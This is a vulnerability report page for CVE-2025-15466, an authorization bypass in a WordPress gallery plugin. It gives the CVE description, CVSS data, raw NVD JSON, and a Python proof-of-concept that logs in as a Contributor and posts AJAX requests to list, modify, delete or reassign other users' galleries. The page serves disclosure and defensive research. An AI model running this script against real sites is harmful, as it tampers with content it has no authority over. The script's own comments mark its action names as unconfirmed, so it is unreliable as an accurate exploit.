Security Vulnerability Report
CVE-2025-15466 CVSS 5.4 MEDIUM

CVE-2025-15466

Published: 2026-01-20 00:15:48
Last Modified: 2026-04-15 00:35:42

Description

The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple AJAX actions in all versions up to, and including, 3.6.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to view, create, modify, clone, delete, and reassign ownership of galleries created by other users, including administrators.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Image Photo Gallery Final Tiles Grid <= 3.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-15466 PoC - Final Tiles Grid Plugin Authorization Bypass
# Authentication Required: Contributor+ role
# Target: WordPress site with Final Tiles Grid plugin <= 3.6.9
#
# What this script actually does: it authenticates against wp-login.php as a
# low-privileged user and then POSTs plugin AJAX actions to admin-ajax.php
# using that session's cookies. The bug being illustrated is CWE-862 (missing
# capability check): the plugin handler never verifies that the caller is
# allowed to act on the gallery, so any logged-in user reaches it.
#
# NOTE(review): the action names ('ftg_*') and the 'nonce' parameter below are
# not confirmed by this page's references (the fixed changeset and the Wordfence
# advisory); treat them as illustrative until checked against the plugin
# source. The fix on the vendor side is a capability check (and nonce
# verification) in every AJAX handler, not a change to the client.
import requests
import json

# Placeholder values; nothing here is site-specific.
TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker"
PASSWORD = "attacker_password"

def get_auth_cookie():
    """Login and get authentication cookie.

    Returns:
        The session's cookie jar as a plain dict.

    Note: `response` is never inspected, so the cookie dict is returned
    regardless of whether the login actually succeeded; the caller's
    `if cookies:` check only tells whether any cookie was set at all.
    """
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()
    # Standard wp-login.php form fields.
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    response = session.post(login_url, data=login_data)
    return session.cookies.get_dict()

def exploit_unauthorized_gallery_access(cookies):
    """Exploit: Access galleries created by other users.

    Posts the listing action to admin-ajax.php with the low-privileged
    session cookies and returns the parsed JSON body.

    Raises:
        ValueError (via `response.json()`) if the body is not JSON, e.g.
        the WordPress default "0" reply for an unknown action.
    """
    ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    # List all galleries (including admin galleries)
    data = {
        'action': 'ftg_get_galleries',  # action name unconfirmed by page references
        'nonce': 'any_value'  # dummy value: the premise is that it is not checked
    }
    response = requests.post(ajax_url, data=data, cookies=cookies)
    print(f"Gallery List Response: {response.text}")
    return response.json()

def exploit_gallery_modification(cookies, gallery_id):
    """Exploit: Modify galleries created by other users.

    Args:
        cookies: cookie dict from get_auth_cookie().
        gallery_id: id of a gallery owned by another user.

    Only prints the raw response; nothing is returned. Not called from
    __main__ below.
    """
    ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    # Modify gallery settings
    data = {
        'action': 'ftg_save_gallery',  # action name unconfirmed by page references
        'gallery_id': gallery_id,
        'settings': json.dumps({'name': 'Modified by Attacker'})
    }
    response = requests.post(ajax_url, data=data, cookies=cookies)
    print(f"Modification Response: {response.text}")

def exploit_gallery_deletion(cookies, gallery_id):
    """Exploit: Delete galleries created by other users.

    Same shape as exploit_gallery_modification; prints the raw response
    and returns nothing. Not called from __main__ below.
    """
    ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    data = {
        'action': 'ftg_delete_gallery',  # action name unconfirmed by page references
        'gallery_id': gallery_id
    }
    response = requests.post(ajax_url, data=data, cookies=cookies)
    print(f"Deletion Response: {response.text}")

def exploit_ownership_transfer(cookies, gallery_id, new_owner_id):
    """Exploit: Transfer gallery ownership.

    Args:
        cookies: cookie dict from get_auth_cookie().
        gallery_id: id of the gallery to reassign.
        new_owner_id: user id that becomes the new owner.

    Prints the raw response and returns nothing. Not called from
    __main__ below.
    """
    ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    data = {
        'action': 'ftg_transfer_ownership',  # action name unconfirmed by page references
        'gallery_id': gallery_id,
        'new_owner': new_owner_id
    }
    response = requests.post(ajax_url, data=data, cookies=cookies)
    print(f"Ownership Transfer Response: {response.text}")

if __name__ == "__main__":
    # Only the listing action is exercised; the other helpers are defined
    # but never invoked. From a detection standpoint the observable trace is
    # a Contributor-level session posting plugin AJAX actions to
    # admin-ajax.php, which is what server-side logging should surface.
    print("Starting CVE-2025-15466 exploitation...")
    cookies = get_auth_cookie()
    if cookies:
        galleries = exploit_unauthorized_gallery_access(cookies)
        # Additional exploitation steps...
        print("Exploitation completed.")
    else:
        print("Authentication failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15466", "sourceIdentifier": "[email protected]", "published": "2026-01-20T00:15:47.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple AJAX actions in all versions up to, and including, 3.6.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to view, create, modify, clone, delete, and reassign ownership of galleries created by other users, including administrators."}, {"lang": "es", "value": "El plugin Image Photo Gallery Final Tiles Grid para WordPress es vulnerable a acceso no autorizado y modificación de datos debido a la falta de comprobaciones de capacidad en múltiples acciones AJAX en todas las versiones hasta la 3.6.9, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, puedan ver, crear, modificar, clonar, eliminar y reasignar la propiedad de galerías creadas por otros usuarios, incluidos los administradores."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3435746/", "source": "[email protected]"}, {"url": 
"https://www.wordfence.com/threat-intel/vulnerabilities/id/0afcfe15-2d7d-4c96-a408-28f35577a927?source=cve", "source": "[email protected]"}]}}